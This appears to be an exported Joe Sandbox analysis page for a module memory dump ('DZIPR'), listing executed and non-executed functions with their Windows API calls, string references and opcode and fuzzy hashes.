Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 10937d0a5cf0c58fe0edf493b454a81fbece2a7c540e64e8f408f60e9e51999e
Instruction ID: fcafb2dcdc690aa4161da37a671b8a0133f9a1a3decb596ab59a348fffa09410
Opcode Fuzzy Hash: 10937d0a5cf0c58fe0edf493b454a81fbece2a7c540e64e8f408f60e9e51999e
Instruction Fuzzy Hash: 8F31C171A04B04AFDB20AF68C849A5A7FF9FF45314F24492EE552D7250EB30F955CB90

Function 6FE264E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FE26602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FE2663B

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: b74788dd3d980e7f9a8d623bf223e7e5ce129996ea4cbea3c8c0aaf1b6a5a65e
Instruction ID: 5e3fe8f6d3b0cca1386ae55234cca21305d55ce1a1317350feeab647f6195b36
Opcode Fuzzy Hash: b74788dd3d980e7f9a8d623bf223e7e5ce129996ea4cbea3c8c0aaf1b6a5a65e
Instruction Fuzzy Hash: 2C51F4306083558FC715CF58C88062AFFE6BFCA308F298A6DE88547316D631F916CB91

Function 6FE26750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FE4C168), ref: 6FE26300

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6efe59a72388a5c63ad578e8dea4e1ff7c65a28ea986ac7a95576acfa99ad0ec
Instruction ID: 46261b7176f99aa9d032b13b55b782d36fa5880f72e1ed8edd74238fab5bd710
Opcode Fuzzy Hash: 6efe59a72388a5c63ad578e8dea4e1ff7c65a28ea986ac7a95576acfa99ad0ec
Instruction Fuzzy Hash: 8D41B4316087058FC718CF19C88067ABBE6FFC6314F29866DE88997355E635F8658B81

Function 6FE262D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FE4C168), ref: 6FE26300

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 91dd216fdbb89bb69ae6922028add6641c3c3f33789a833f1dbf4794981a708d
Instruction ID: ff745d4caed79522ba0c407aaeb0f601b8b9c1faca799c592199dde62dfd8f40
Opcode Fuzzy Hash: 91dd216fdbb89bb69ae6922028add6641c3c3f33789a833f1dbf4794981a708d
Instruction Fuzzy Hash: 5B31D331A087058FC718CF19C88066ABBE2FFC6314F298A6DE89557356E735F865CB81

Function 6FE2C050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6FE2C057

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: d8fed6d9db459f6d5701d1ead1e152fa941d082e5187eaa0e68aacb74495362a
Instruction ID: d30681a4f924283f569b414f56252f942dbb818612d4d7aa57cd701f73366110
Opcode Fuzzy Hash: d8fed6d9db459f6d5701d1ead1e152fa941d082e5187eaa0e68aacb74495362a
Instruction Fuzzy Hash: 9E014834A00A169BDB18AF69C815A697EE3AF82329B30842DE5558A3D0EF32D9518B51

Function 6FE260F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FE260F6

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0a9ca1ffb8735f66016f5abe9267b3b11b7d485bb87bcddff6fd61522bf5262c
Instruction ID: 6ddcab253238e0618b8695f76b543e97273ccd3c74e5caa624c776bb7623cdf2
Opcode Fuzzy Hash: 0a9ca1ffb8735f66016f5abe9267b3b11b7d485bb87bcddff6fd61522bf5262c
Instruction Fuzzy Hash: B401FF709087019FC718CF4AC890906FBE5FFC9314F15856DA84897316D735E851CF85

Function 6FE3A6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FE34776,00000001,?,?,?,6FE348EF,?,?,?,6FE4E848,0000000C,6FE349AA), ref: 6FE3A709

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: db5bc68dd61cb59cb8abcdab89aceaf75f8d6a9cce5e7d12f7b9f3199ea919dd
Instruction ID: 51f705d757abf6124c0782b1ed067f2e49b9c9874e590e204d6261a92fe33ba7
Opcode Fuzzy Hash: db5bc68dd61cb59cb8abcdab89aceaf75f8d6a9cce5e7d12f7b9f3199ea919dd
Instruction Fuzzy Hash: FBD02E329A87449AEF009E705C087263FEC93827AAF204436F80DC6180E570D2A0CA00

Non-executed Functions

Function 6FE2748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FE27498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FE276D5,?,00000000,?,00000000,00000104,00000000,?,6FE4BEF4,00000000), ref: 6FE274D6

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FE27546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FE2756D
CharUpperW.USER32(00000000), ref: 6FE275A0
FindFirstFileW.KERNEL32(?,?), ref: 6FE275BC
FindClose.KERNEL32(00000000), ref: 6FE275C8
lstrlenW.KERNEL32(?), ref: 6FE275E6

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 6e7b290f63bb2a8605ee10be02830394b395a27ab8feb5ebf3c2c9e39a77be3d
Instruction ID: 84a82b40a20dd358a8c8f74ee1cb1dd140557e33646bf92699a8884de30dfc22
Opcode Fuzzy Hash: 6e7b290f63bb2a8605ee10be02830394b395a27ab8feb5ebf3c2c9e39a77be3d
Instruction Fuzzy Hash: CD4186719086269BDF14AF64CC9CBAE7FB8AF12318F2002DDE91991190FB359B95CF50

Function 6FE33F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6FE37C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE37C81
UnhandledExceptionFilter.KERNEL32(6FE4A4B8), ref: 6FE37C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6FE37CA8
TerminateProcess.KERNEL32(00000000), ref: 6FE37CAF

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 54bcfd7afec5669bce47a94433405906e703c7ae2fdc9b4c017a2d840211903c
Instruction ID: bd80223d68529e3dc61d736f1fd350bb7c9dec19aef15a0505fce58e7658eb17
Opcode Fuzzy Hash: 54bcfd7afec5669bce47a94433405906e703c7ae2fdc9b4c017a2d840211903c
Instruction Fuzzy Hash: 4221CEB9816B04DFDF48DF59C9496483FB4BB8B338F60001AE50886390D7B255B5CF42

Function 6FE289B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FE289FC
__snwprintf_s.LIBCMT ref: 6FE28A2E
LoadLibraryW.KERNEL32(?), ref: 6FE28A69

Part of subcall function 6FE35348: __getptd_noexit.LIBCMT ref: 6FE35348

Strings

LOC, xrefs: 6FE289DC

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: ce46915d2a54fa5f28ce5204614a06970ec71db3da959b1bd5c26dc660b88a4e
Instruction ID: 84b788e832060a0a87689be6ce2db00cb420f328892526218af7a9ab3031a72d
Opcode Fuzzy Hash: ce46915d2a54fa5f28ce5204614a06970ec71db3da959b1bd5c26dc660b88a4e
Instruction Fuzzy Hash: 3811A8B2E55314AADB10AB78CC48BAD7FECAB42358F30016AE114971D0EF749B05D7A1

Function 6FE304EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FE32C57: GetWindowLongW.USER32(?,000000F0), ref: 6FE32C62

GetKeyState.USER32(00000010), ref: 6FE30514
GetKeyState.USER32(00000011), ref: 6FE3051D
GetKeyState.USER32(00000012), ref: 6FE30526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FE3053C

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 53d1b2d42fc24cc90a976e00a004f6ab2b28ada57c823da19675336ac7b97120
Instruction ID: ecd1b400d7d5ba7af243a9adee348b5a7f7afc8f5f47f30ac989704af7809d62
Opcode Fuzzy Hash: 53d1b2d42fc24cc90a976e00a004f6ab2b28ada57c823da19675336ac7b97120
Instruction Fuzzy Hash: 7AF0E937F403AFB5EA2025754C09FFA0D254F81BFCF20143A6745AA1C0CEA0C502D6B0

Function 6FE2DE29 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2019a6441ab93e903ff8fd0e5187873eece7cec4e89724a1c168e2e87e08c612
Instruction ID: 9313c31e52e7e599f5949e63af960237460a7432c8582eefeab52d6b3f97b5e4
Opcode Fuzzy Hash: 2019a6441ab93e903ff8fd0e5187873eece7cec4e89724a1c168e2e87e08c612
Instruction Fuzzy Hash: 9CF06239904208AADF116F75CD049DA3FEAAF12754F54C015FA1984050EB30D656DB50

Function 6FE25D78 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd48d43933c838637bf7aace1212e5b1547043550ba7a9064d12ab8c80de7ac9
Instruction ID: 47c496f77901cbdaadfec130f964e113e8dbc923be7abc75f9351d6e16952516
Opcode Fuzzy Hash: dd48d43933c838637bf7aace1212e5b1547043550ba7a9064d12ab8c80de7ac9
Instruction Fuzzy Hash: C5316A75A087058BC724CF59CA8062ABBE2FFC9718F66852DD88857305EB30F855CB81

Function 6FE28BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FE28BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FE28EB7,?,?), ref: 6FE28C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FE28C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C69
ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FE28C94
ConvertDefaultLocale.KERNEL32(?), ref: 6FE28CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FE28CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FE28CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FE28CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6FE28D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6FE28D3A
GetModuleFileNameW.KERNEL32(6FE20000,?,00000105), ref: 6FE28D7F
_memset.LIBCMT ref: 6FE28D9F

Strings

ntdll.dll, xrefs: 6FE28CDC
kernel32.dll, xrefs: 6FE28C02
GetSystemDefaultUILanguage, xrefs: 6FE28C79
GetUserDefaultUILanguage, xrefs: 6FE28C21

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 81c5720f7fdc6933053d61f0b47888968ba790ce56e34c3176c0c74ab8fa2eec
Instruction ID: 8bd5ca5180db3c5aac95efef57796de8cde0c04dec2f9484d37c51f62dabdb9e
Opcode Fuzzy Hash: 81c5720f7fdc6933053d61f0b47888968ba790ce56e34c3176c0c74ab8fa2eec
Instruction Fuzzy Hash: FD511C71D152299ACB60EFA5DC887ADBAF4EF58314F2001DBA448E3280EB749F85CF55

Function 6FE2DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6FE2DE36,?,?,?,?,?,?,?,6FE2FCC6,00000000,00000002,00000028), ref: 6FE2DCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FE2DD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FE2DD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FE2DD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FE2DD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FE2DD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FE2DD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FE2DD8E

Strings

GetSystemMetrics, xrefs: 6FE2DD0F
EnumDisplayMonitors, xrefs: 6FE2DD57
MonitorFromRect, xrefs: 6FE2DD35
MonitorFromWindow, xrefs: 6FE2DD24
GetMonitorInfoA, xrefs: 6FE2DD88
EnumDisplayDevicesW, xrefs: 6FE2DD68
GetMonitorInfoW, xrefs: 6FE2DD81
USER32, xrefs: 6FE2DCEF
MonitorFromPoint, xrefs: 6FE2DD46

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: 025313e343b16878fd305464fbbf22c7b1b66a35510279697a8e3edf7048670c
Instruction ID: afb44c7a1874c17c9ef82e51a0e34bbfdec894cc597eeac577852d0b94b14836
Opcode Fuzzy Hash: 025313e343b16878fd305464fbbf22c7b1b66a35510279697a8e3edf7048670c
Instruction Fuzzy Hash: 2F21A4758189619FCB146F7DE9D446E7FE5BB4B129334663FD201E2208D7729071DB20

Function 6FE319AE Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FE319B8

Part of subcall function 6FE2C050: __EH_prolog3.LIBCMT ref: 6FE2C057

CallNextHookEx.USER32(?,?,?,?), ref: 6FE319F8

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

_memset.LIBCMT ref: 6FE31A51
GetClassLongW.USER32(?,000000E0), ref: 6FE31A85
SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FE31ADA
GetClassNameW.USER32(?,?,00000100), ref: 6FE31B20
GetWindowLongW.USER32(?,000000FC), ref: 6FE31B46
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FE31B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FE31B86
SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FE31B94
CallNextHookEx.USER32(?,00000003,?,?), ref: 6FE31BA6
UnhookWindowsHookEx.USER32(?), ref: 6FE31BBA

Strings

AfxOldWndProc423, xrefs: 6FE31B56, 6FE31B5B, 6FE31B6D, 6FE31B75, 6FE31B85
#32768, xrefs: 6FE31A63, 6FE31A68, 6FE31B36

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 4265692241-2141921550
Opcode ID: cd4e678a521bf35d9124c9b2af7bf7ae7875155c6b37ff8e226986318306ba22
Instruction ID: 8f54b19def7455a045ccf254793f9073d060706c1af2a24aa7d76eb9790a0bad
Opcode Fuzzy Hash: cd4e678a521bf35d9124c9b2af7bf7ae7875155c6b37ff8e226986318306ba22
Instruction Fuzzy Hash: 9D51A432D44735EBDB11AF64CC4CB9A7FB8BF06365F20119DF40996290EB349A91CBA1

Function 6FE2FBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FE32C57: GetWindowLongW.USER32(?,000000F0), ref: 6FE32C62

GetParent.USER32(?), ref: 6FE2FC05
